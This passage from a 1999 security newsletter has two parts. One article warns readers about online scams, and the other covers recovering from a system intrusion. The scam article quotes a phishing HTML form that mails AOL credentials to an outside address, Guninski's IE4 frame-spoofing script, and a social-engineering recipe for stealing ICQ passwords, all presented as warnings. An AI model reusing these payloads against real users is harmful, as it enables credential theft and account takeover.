I'm writing this defaced again. So when you access this page it gives you
exactly the same look as the AOL NetMail site (www.aol.com/netmail).
You have a form where you can enter Screen Name and appropriate password.
When you enter it, form doesn't do what you think it is supposed to do:
it sends an e-mail message to the creator of it with your login and
password. Code follows:

<********************************************************************>

<form action="http://bewoner.dma.be/bew-bin/ukmailer.cgi" method=POST>
<INPUT TYPE="HIDDEN" NAME="recipient" VALUE="sabbs@hotmail.com">
<input type=hidden name="subject" value="You've Got Mail">
<input type=hidden name="redirect" value="http://pages.hotbot.com/biz/
deity/error.html">

<********************************************************************>

So it sends your information and you get a html note that you entered
the wrong password and it redirects you to the REAL Net Mail log-on 
site. On this way, if you were not too cautious, you shared your info, 
and you don't have a clue that you did it.
Just to add -  Scammers obtaining a screen name or password could 
potentially do considerable harm on an AOL member's account. An 
account violator could use the member's communications features, such 
as email and the instant messenger buddy list, or even purchase goods 
with the member's credit card.

I was thinking about how this fraud trick could be even more realistic.
Well when you enter the password, new html file opens that says that 
you must try again, and the Address bar in this issue says:
http://pages.hotbot.com/biz/deity/error.html
If you add some Java script and if you know for frame spoofing 
vulnerability, you could improve the scam to maximum.
Frame spoofing vulnerability is found by Georgi Guninski and it "works"
on Internet Explorer 4.x browsers (the bug was patched afterwards).
This example opens a fake www.yahoo.com website.

<********************************************************************>

<SCRIPT>
b=showModalDialog("about:<SCRIPT>a=window.open('http://www.yahoo.com');
a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD><H1>Look
at the address bar!<BR>');a.document.write('<A HREF=\"http://www.whiteh
ats.com/guninski\">Go to Georgi Guninski\\'s home page</A></H1></BODY>
</HTML>');close()</"+"SCRIPT>%01http://www.yahoo.com");
</SCRIPT>
 
<********************************************************************>

All this information about successfully using Frame spoofing vulnerability
with this scam is presented in educational purpose, for you, to see
that you must be real careful, because with some little tricks you 
could be deceived easily.


(3)
  ICQ password stealing

If you are non-suspicious, you could easily lose your ICQ password.
This is the "ICQ exploit" that could be found on some "underground 
sites on the Internet. It isn't really an exploit, but just a way
to get someone's ICQ password easily. 

<********************************************************************>

Ok..the trick to this is to trick someone into putting
your email address as their email address..and then you
goto www.icq.com/password and type in their UIN..it sends
their password to the email in their info..now here are a
few tricks to get them to put your email or any email you know
the password to in their ICQ info..

1)you have a klan? Ask them to join..if they do..tell them
you have a klan email..(yourklan@hotmail.com)or whatever
tell them to put that as their email so people can contact

<********************************************************************>

So don't change your e-mail settings for ICQ, because it couldn't be
good for you (try to think, why would someone tell you that you write
his e-mail address in your ICQ settings, what could he absolutely get
than using it against you. Well most of this scams work on a social 
engineering base - they try to make you believe them.


(4)
  Combinations

Following two stories were picked up by news sites.

CNET (www.cnet.com) 04.03.1998 > "Hotmail suffers email scam" 

A Hotmail user who registered the name "admin@hotmail.com" sent out 
official-sounding email to an indeterminate number of people earlier 
this week telling users that "The trial period for your free Hotmail 
Service is rapidly coming to a close." 
It goes on to tout Hotmail's features and tells users the accounts will
cost $10 per year. It then requests that the user send an email to 
"admin@hotmail.com" for an account form. 
"Payments will be accepted by certified cheque, money order, or credit 
cards only," it states. 
Hotmail pulled the account yesterday as soon as the staff found out 
about it, said Randy Delucchi, Hotmail's director of customer service. 
Delucchi said he wasn't sure how many people got the email message, 
but added he was sure it "wasn't very widespread at all," because 
Hotmail has implemented antispam measures that prevent email from being
sent to more than 25 people at a time. 
Spammers generally like to send email to thousands of people at once. 
This is not the first time people have used free email to try to scam 
their fellow Netizens. 
In December, someone used Yahoo's free email to send out an 
official-looking letter telling users they had won a modem from Yahoo 
and would have to supply their names, addresses, and telephone numbers 
as well as a credit card number to pay for shipping. 

CNET (www.cnet.com) 22.04.1999 > "AOL warns of email scam" 

America Online is warning users that email messages posing as 
AOL-endorsed offers and notices are really trying to gather sensitive 
member information.
A number of these messages have such subject headings as "AOL Server 
Error," "AOL Billing Problem," "Beanie Babies," or "AOL Rewards," and 
are intended to lure members to open them, according to a cautionary 
posting on the "Neighborhood Watch" page within AOL's proprietary 
service.
The warning says the messages contain HTML hyperlinks that lead to 
Web sites pretending to be a standard registration Web page. But these 
pages ask for member screen names or passwords, which could potentially 
lead scammers into AOL member accounts.
One sample email reads: "A database error has deleted the information 
for over 25,000 accounts, and yours is one. In order for us to access 
the back-up data of your account, we do need your password. Without 
your password, we will NOT be able to allow you to sign onto America 
Online within the next 24 hours after your opening of this letter."
According to AOL spokesman Rich D'Amato, AOL posted its warnings three 
weeks ago, prompted by "member complaints, as well as emails that we 
had been seeing."

So you got the point, be very carefull. Scams are different: from the
realy pathetic ones (that Hotmail hacking) to more complecsive (using
frame spoofing). Also note that hack/hacking words are under " ", 
because scams are in no way means or ways of hacking.

Berislav Kucan
aka BHZ
bhz@net-security.org
http://net-security.org



XII. Intrusion and detection part two
---------------------------------------

This is a follow-up to last week's article on responding to an intrusion,
which can be found at http://default.net-security.org/dl/default2.txt.
Today I'll go into a more in-depth look at recovering from an intrusion,
and a brief look at computer forensics -- i.e., what to do if you want to
try to get the law involved in the incident.

Much like any other part of intrusion response, recovery from attack
starts before you've been attacked. It can be very difficult to recover
if you don't have recent backups of your system -- back things up
regularly; nightly if possible. If you've got important information on
your system, a nightly backup just makes sense. I prefer backing up to
tape if you can afford a tape drive, but it's not a requirement. What you
do need is some form of backup that holds your important system files and
binaries, so you can restore if something happens, or a rescue disk that
contains clean versions of important system binaries. Also (preferably at
the time when you actually install your operating system, so you're sure
it's clean), run a program that checks your system. Tripwire, for
instance, is a wonderful tool that works on Solaris, Linux, and Windows
NT. It takes a sort of snapshot of your system and creates a database
which contains the checksum, creation date, and access permissions for
each file. If you feel that your system may have been compromised, you
can run tripwire against it again, and compare the results to see if
anything's changed (tripwire can even be run regularly, to detect
changes; perhaps run it just before your regular backup, to see if
anything's been altered since your last backup). Tripwire aids in
recovery because it can point out exactly which files were damaged or
altered, as in the case of trojaned binaries and rootkits, and can allow
quick replacement of them with good copies. And of course, the third
thing to do before an intrusion begins is to be aware of intrusion
detection tools. Run them, watch the logs, and be alert -- you can't
recover from an attack you don't know happened.

As I discussed last week, one of the most important things you can do is 
log, and maintain the integrity of your logs. The need for good logs
really comes into play here, in several different ways. For the purposes
of this article, I'm assuming that you have intrusion detection tools
running, tripwire installed, and are watching and recording your logs. I
should note that it's best to log to a remote, secure loghost, log to a
printer, or at least make sure that if your logs are on the same host, 
your log files are append-only (only new text can be added) -- most
rootkits now go through and edit logs to remove an attacker's traces. If
you're logging to a different machine or a cheap dot matrix printer in the
corner, they'll have a hard time covering their tracks -- I'm going to
assume, for this article, that your logs are intact.

When your intrusion detection software starts sending out alerts, the most
important rule is -not- to panic. You cannot react faster than data can
come in to your computer -- by the time you've noticed the attack, the
attacker is already several steps ahead of you, and may already be in your
system before you can react.

Isolate the machine. There is one school of thought that advocates
pulling the power cord out of the computer (don't shut down first; many
rootkits install cleanup routines in the system's shutdown proceedures,
and you'll lose anything they'd added). I don't advocate this as a first
step -- I suggest pulling the network cable (modem, ethernet, whatever you
have connecting your machine to the internet). Pulling the power can lose
you a lot of information that would be helpful in diagnostics -- a lot of
scripts put files in /tmp, for instance, and on some operating systems 
that would be lost on a power-down. Once you've gotten the information
you need, run tripwire to get a new database of exactly what the system
looks like now...-then- pull the power cord (again, don't shutdown
normally). The reason for this becomes important later.

It's at this point that you need to decide whether or not to pursue legal
action. In most cases, especially for home users, the hassle of law
enforcement involvement is not worth it, and all you'll want to do is
rebuild and secure your machine. At the end of this article is a brief
discussion of what to do if you -do- want to involve law enforcement.

You've been attacked -- now it's time to rebuild. You have two options --
the easy way and the paranoid way. The paranoid way is pretty
self-explanatory: wipe -everything- and restore from a known clean backup
or reinstall from read-only media. For the easy way, turn your system
back on, but -don't- plug it into the network. Get your clean backup
disk (run tripwire on your backup to make certain it's clean), find the
files that were altered (compare the backup's tripwire database with the
current files on your system), and replace them with the safe binaries
you'd had on your backup. Commonly replaced binaries include /bin/login,
/bin/ps, /bin/ls, /bin/df, /usr/etc/in.telnetd, /usr/etc/in.ftpd,
/usr/etc/in.tftpd, /usr/sbin/ifconfig, etc (note that these locations may 
be different for different flavors of UNIX). Check -everything- -- files
can be changed in unexpected ways, or be added in unusual places. Some
attackers like to hide their files, for instance, in /tmp, /etc/tmp,
/var/temp, /usr/spool, etc. Look for files with spaces in the name. Look
for alterations of /etc/hosts.equiv, /bin/.rhosts (or any .rhosts file at 
all), /etc/passwd, /etc/group, etc. 'Find' is a good command for this; it
can be used to find all suid/sgid files, sneaky .rhosts, etc. Look for
suid root binaries in unexpected places. Next, look to make sure there
isn't a sniffer installed. On UNIX-based machines, if a sniffer's
installed on an interface, the interface will have the PROMISC flag set
(short for 'promiscuous' -- it means the interface is listening to all the
traffic on the network, not just the packets intended for that interface).
Sounds easy? Not so. There are scripts that install a sniffer -and- hide
the PROMISC flag. The way to check is to set the interface PROMISC
yourself, and then check to see if the PROMISC flag shows up. If it
doesn't show up, you may have a problem -- make sure you replace ifconfig
with a known good copy, and again, look for strange suid binaries and
files owned by root that shouldn't be.

Personally, I recommend wiping everything and starting from a good backup.
It's safer, and you don't need to worry about having missed something
important. Reinstalling from known good media may be paranoid, but it
obviates a lot of the work of finding all files that have been tampered
with, and will remove things like sniffers and back doors. If you'd like
to do an in-depth analysis, make a complete sector-by-sector copy of the
compromised disk before you wipe it, then mount (don't boot, mount) the
copy read-only on a known good system, and do your analysis there.

Now start going through the logs. What happened? Do you see anything
unusual? Look as far back through your logs as you can; maybe you'll see
the initial intrusion. Using another computer (or using the hacked
system, if you feel lucky, punk), use search engines to look up anything
in your logs you don't understand; you may be surprised at what you find.
The goal is to find out exactly how the attacker got in, find the hole,
and repair it. Most commonly-exploited holes have patches -- do some
research on your favorite search engine, find the exploit, find the patch,
and fix the hole. If you can't find anything that might have been used
against you (and be sure to look in the Bugtraq archives at
http://www.securityfocus.com/ -- click on 'forums' and then 'bugtraq',
then 'archive'), you may want to email cert@cert.org to notify the CERT
team. They may not respond, but if it really is a new exploit, they'll
look into it -- see http://www.cert.org/tech_tips/incident_reporting.html
for more information. Once you've got your system patched and replaced
all the altered files, change all passwords on the system, just in case
the attacker has your /etc/passwd (or /etc/shadow) file.

But suppose you -do- want to take the matter to law enforcement. The most
important thing you can do, if that's the case, is to preserve
evidence...and your hard drive is evidence. When you pulled the power on
your hacked machine, you preserved as much of the current state of your
system as you could. Now you need to physically remove the hard drive
from the computer, set it to read-only (if you want to do analysis on it, 
make a complete physical sector-by-sector copy, and mount it -- don't boot
it -- read-only on a known 'good' system, and do your analysis on -that-),
and place it in a safe along with a copy of the original tripwire database
and a copy of the tripwire database you'd taken just before pulling the
plug. Also put into the safe all of the relevant logs, also in read-only
format to prove they have not been edited -- one idea is to print out
your logs, sign and date them, and have them notarized to prove the
electronic copies have not been tampered with. Include as well as much
information as you had been able to gather about the attacker (see the
previous article at http://default.net-security.org/dl/default2.txt for a
simple discussion of how to identify the attacker). The more information
you can provide law enforcement, the more likely they are to be able to
prosecute. Document everything you possibly can -- a clear chain of
evidence must be compiled before you can hope to have anything done, and
you must be able to show that that evidence has not been tampered with.
Once you have all your evidence, contact law enforcement -- I should note
that, just as it's a good idea to know who your ISP's security team is
ahead of time, it's handy to know ahead of time who to contact among local
law.

And be nice to them. You -want- them to like you.

Comments to this article are welcome -- not everyone responds to incidents
in the same way, and I'd be very interested in hearing other methods, or
hearing opinions I may not have considered yet.

/dev/null
null@fiend.enoch.org

(thanks to mike@enoch.org for his help with this article)







--------------------------------------------------------------------------------
				Default newsletter Issue #3
				http://default.net-security.org
				27.08.1999 Help Net Secutity
				http://www.net-security.org
--------------------------------------------------------------------------------